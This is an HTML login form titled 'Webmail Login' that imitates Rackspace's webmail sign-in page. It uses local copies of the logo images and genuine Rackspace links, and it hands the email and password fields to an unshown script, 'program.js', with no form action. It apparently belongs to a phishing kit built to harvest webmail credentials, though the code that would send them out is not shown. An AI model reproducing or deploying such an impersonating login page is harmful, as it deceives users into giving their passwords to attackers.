 

      
        
   
        <form> 
 
            
            <div class="header">
                <p class="title">Webmail Login</p>
                <img alt="logo" src="./images/rac1.png">
            </div> 
                  
             <div class='laptopForm'> 
                    
                <div class="laptopImage"> <br>
                  <div class="laptopImage2">  
                     <img src="./images/rac2.jpg">
                     </div>
                </div>
                  
              <div class="formentries"> 
                <p id="error"></p> 
              
                <p class="email">Email address</p> 
                <input type="email" id="email" class="emailentry"> 
            <div class="emandforgot">  <p class="password">Password</p>  <a href="https://apps.rackspace.com/wmidentity/recover/password" class="forgotpass">Forgot password?</a>   </div> 
            <input type="password" id="password" class="passwordentry"> 
    
                 <br><br> <button class="login">Log In</button>    <br><br>
          
                       <div class="links"> <a href="https://www.rackspace.com/information/legal/privacystatement">Privacy Statement  |</a> <a href="https://www.rackspace.com/information/legal/websiteterms">Website Terms</a> </div>
              </div>     


                 </div> 

                  
    
                  <div class="footer">
                    <p>Need webmail for your business? Learn about  <span id="nav">  Hosted Email </span> from Rackspace</p>
                  </div> 

                  
           
    
    
                    </form>
    
       <script src="program.js">    </script>
    
     